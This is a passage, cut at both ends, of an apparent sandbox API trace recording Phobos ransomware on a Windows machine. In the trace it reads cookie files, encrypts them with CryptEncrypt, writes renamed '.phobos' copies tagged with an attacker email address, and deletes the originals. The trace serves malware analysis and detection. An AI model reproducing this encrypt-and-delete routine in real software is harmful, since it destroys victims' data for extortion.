pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.231] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.231] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1ea, lpOverlapped=0x0) returned 1 [0194.232] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f0, dwBufLen=0x1f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1f0) returned 1 [0194.232] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1f0, lpOverlapped=0x0) returned 1 [0194.233] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.233] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.233] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.233] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.233] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.234] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.234] CloseHandle (hObject=0x134) returned 1 [0194.234] CloseHandle (hObject=0x154) returned 1 [0194.234] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@bing[1].txt")) returned 1 [0194.235] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.236] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=456) returned 1 [0194.237] CloseHandle (hObject=0x154) returned 1 [0194.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt")) returned 0x2020 [0194.237] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.237] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.237] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.238] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.238] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.238] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x1c8, lpOverlapped=0x0) returned 1 [0194.239] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d0, dwBufLen=0x1d0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x1d0) returned 1 [0194.239] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x1d0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x1d0, lpOverlapped=0x0) returned 1 [0194.240] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.240] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.240] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.240] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.240] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.240] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.240] CloseHandle (hObject=0x154) returned 1 [0194.240] CloseHandle (hObject=0x134) returned 1 [0194.240] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.bing[1].txt")) returned 1 [0194.241] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.242] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=130) returned 1 [0194.242] CloseHandle (hObject=0x134) returned 1 [0194.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt")) returned 0x2020 [0194.242] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.242] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.242] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.242] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.244] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.244] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.244] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x82, lpOverlapped=0x0) returned 1 [0194.245] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x90, dwBufLen=0x90 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x90) returned 1 [0194.245] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x90, lpOverlapped=0x0) returned 1 [0194.246] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.246] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.246] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.246] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.246] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.246] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.246] CloseHandle (hObject=0x134) returned 1 [0194.246] CloseHandle (hObject=0x154) returned 1 [0194.246] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@c.msn[1].txt")) returned 1 [0194.247] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.248] GetFileSizeEx (in: hFile=0x154, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=272) returned 1 [0194.249] CloseHandle (hObject=0x154) returned 1 [0194.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt")) returned 0x2020 [0194.249] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.249] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.249] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.249] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.250] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.250] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.250] ReadFile (in: hFile=0x154, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x110, lpOverlapped=0x0) returned 1 [0194.251] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0194.251] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0194.252] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32be8) returned 1 [0194.252] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.252] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.252] CryptDestroyKey (hKey=0xa32be8) returned 1 [0194.252] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.252] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.252] CloseHandle (hObject=0x154) returned 1 [0194.252] CloseHandle (hObject=0x134) returned 1 [0194.252] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@doubleclick[2].txt")) returned 1 [0194.253] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.253] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.254] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=598) returned 1 [0194.254] CloseHandle (hObject=0x134) returned 1 [0194.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt")) returned 0x2020 [0194.254] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0194.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.254] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.254] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0194.254] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x154 [0194.255] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0194.255] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.255] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x256, lpOverlapped=0x0) returned 1 [0194.368] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x260, dwBufLen=0x260 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x260) returned 1 [0194.368] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x260, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x260, lpOverlapped=0x0) returned 1 [0194.369] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32ae8) returned 1 [0194.369] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0194.369] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70, dwBufLen=0x70 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x70) returned 1 [0194.369] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0194.369] WriteFile (in: hFile=0x154, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x122, lpOverlapped=0x0) returned 1 [0194.369] CryptDestroyKey (hKey=0xa327e8) returned 1 [0194.369] CloseHandle (hObject=0x134) returned 1 [0194.369] CloseHandle (hObject=0x154) returned 1 [0194.664] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@google[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@google[1].txt")) returned 1 [0194.665] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0194.665] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0194.666] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=32768) returned 1 [0194.666] CloseHandle (hObject=0x134) returned 1 [0194.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat")) returned 0x2026 [0194.666] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js 